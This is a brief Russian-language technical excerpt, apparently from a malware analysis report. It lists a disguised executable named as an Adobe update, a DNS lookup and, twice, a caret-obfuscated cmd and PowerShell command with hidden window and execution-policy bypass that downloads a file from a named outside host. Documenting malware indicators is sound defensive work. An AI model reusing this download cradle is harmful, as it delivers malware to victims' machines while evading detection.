Техническая информация
- http://sergiosuarezgil.com/adobe_upd10.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "po^wer^sh^E^LL^.^ExE -e^x^EC^utionpOli^c^Y^ ^b^ypasS^ -^N^Oprof^I^l^e -^W^i^ndow^st^Y^Le hI^DDen ^(nEW^-^OBj^EC^t S^y^sT^em.nE^T.wE^B^cl^IE^Nt).^d^oWNloadFIlE('http://sergiosu...
- DNS ASK se####suarezgil.com
- '<SYSTEM32>\cmd.exe' /C "po^wer^sh^E^LL^.^ExE -e^x^EC^utionpOli^c^Y^ ^b^ypasS^ -^N^Oprof^I^l^e -^W^i^ndow^st^Y^Le hI^DDen ^(nEW^-^OBj^EC^t S^y^sT^em.nE^T.wE^B^cl^IE^Nt).^d^oWNloadFIlE('http://sergiosu...' (со скрытым окном)